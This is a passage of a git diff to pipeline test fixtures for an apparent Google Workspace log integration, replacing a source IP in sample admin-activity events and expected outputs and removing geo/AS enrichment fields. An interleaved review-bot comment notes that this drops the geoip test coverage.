 "action": "TRANSFER_DOCUMENT_OWNERSHIP",
 "id": "1",
@@ -92,7 +74,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
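Review bot: In test-admin-docs.log-expected.json the TRANSFER_DOCUMENT_OWNERSHIP document loses `source.geo` and `source.as` with nothing added in their place, so after this change no document in the file exercises the geoip/AS lookup that used to be verified against `98.235.162.24`. Before merging, confirm that `67.43.156.13` is an address the pipeline-test GeoIP database resolves; if it is, the expected file was most likely regenerated without that database and should be regenerated again, and if it is not, the removal of enrichment coverage should be called out explicitly rather than left as a side effect of an IP swap. The `event.ingested` churn on the same lines is the usual regeneration noise and needs no action.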
@@ -112,35 +94,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.984925Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:31.510420800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "start": "2002-10-02T12:00:00.000Z",
 "action": "DRIVE_DATA_RESTORE",
@@ -171,7 +135,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -195,35 +159,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.984928700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:31.510426300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOCS_SETTING",
 "id": "1",
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log
index b452d9e8d94..6bb8cb62757 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log
@@ -1,85 +1,85 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
